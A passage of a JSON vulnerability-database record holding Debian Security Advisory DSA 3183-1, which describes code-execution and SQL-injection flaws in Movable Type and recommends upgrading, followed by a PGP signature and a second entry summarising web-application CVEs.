CVE-2013-2184 CVE-2014-9057 CVE-2015-1592\r\nDebian Bug : 712602 774192\r\n\r\nMultiple vulnerabilities have been discovered in Movable Type, a\r\nblogging system. 
The Common Vulnerabilities and Exposures project\r\nidentifies the following problems:\r\n\r\nCVE-2013-2184\r\n\r\n Unsafe use of Storable::thaw in the handling of comments to blog\r\n posts could allow remote attackers to include and execute arbitrary\r\n local Perl files or possibly remotely execute arbitrary code.\r\n\r\nCVE-2014-9057\r\n\r\n Netanel Rubin from Check Point Software Technologies discovered a\r\n SQL injection vulnerability in the XML-RPC interface allowing\r\n remote attackers to execute arbitrary SQL commands.\r\n\r\nCVE-2015-1592\r\n\r\n The Perl Storable::thaw function is not properly used, allowing\r\n remote attackers to include and execute arbitrary local Perl files\r\n and possibly remotely execute arbitrary code.\r\n\r\nFor the stable distribution (wheezy), these problems have been fixed in\r\nversion 5.1.4+dfsg-4+deb7u2.\r\n\r\nWe recommend that you upgrade your movabletype-opensource packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: https://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG 
v1\r\n\r\niQIcBAEBCgAGBQJVAa8VAAoJEAVMuPMTQ89E6aIP/ix6u/0PcbNUQ5hx6onnWhad\r\nI8tZAxLHIfh01+JZbry9MnadnXC11RshnpaztBB82s+ZYVUPq0+wqBsRPm31iRa1\r\nLdjOz/xttoqqqP+wwHbQ/MyGEaDV8KDP/4wWr5TITnQGJjvVW2ZN/ijEHi2G6omg\r\now2s2flvvW5UWB/0Jwvr4aD1JU3DH4U29p9KwRRge8ytIJ1d7VMcHBWVaRjSiVfd\r\n2yxwSdp30RMCOy8m7WsiEHssfHY6PNK0tXphE9UOV/bR+ESSmC3DR+n6XxLZHAvY\r\nyGMCkAs/rnomo/skdn1KFEshj+9znT1AzhjyJzrfspujm9nL6WhXgYwEcBtySNnv\r\nJDHd41WXbvRvkg9zXFOwJ/1WTnQsM4e7R0vH94WMNnJbgxJTgUaG7Ym6jv1aiAD5\r\nqFVCBWixdyPWyrXUMRi9tZdYKUIpoyzCakbe6LoLtWlmdk2BzVFBKbp3uHerMbB2\r\nrw1J7rTKq7iILU2b/qVOuDoZGkenndC/EAmyqOuTvjrvKy+wuiY7j0TEbLIvqnDT\r\nmfUJpA7HQMCBcRd5cai06OEh2fM33uHICbyCkxBgUoEFZ/SGx7OXvpDRlLzaSM0Y\r\nRK7zILxn4+igsSigE8g9K4ogn9M8l25wVcefPYSAon/voFdyKMe/NLqI81218nb6\r\nqvErBYcK2WeTFrDeN7Qy\r\n=eA9w\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2015-03-23T00:00:00", "published": "2015-03-23T00:00:00", "id": "SECURITYVULNS:DOC:31849", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31849", "title": "[SECURITY] [DSA 3183-1] movabletype-opensource security update", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:59", "bulletinFamily": "software", "cvelist": ["CVE-2014-9057", "CVE-2015-1165", "CVE-2015-1220", "CVE-2015-1218", "CVE-2015-1214", "CVE-2015-2275", "CVE-2015-1223", "CVE-2015-1231", "CVE-2015-1217", "CVE-2015-1592", "CVE-2015-1213", "CVE-2014-9472", "CVE-2015-1227", "CVE-2015-1464", "CVE-2015-2062", "CVE-2015-1228", "CVE-2015-1224", "CVE-2015-1215", "CVE-2015-1222", "CVE-2013-2184", "CVE-2014-8487", "CVE-2015-1219", "CVE-2015-1229", "CVE-2015-1221", "CVE-2015-1216", "CVE-2015-1238", "CVE-2015-1230", "CVE-2015-1306", "CVE-2015-1026"], "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 1, "modified": "2015-03-23T00:00:00", "published": "2015-03-23T00:00:00", "id": 
"SECURITYVULNS:VULN:14346", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14346", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}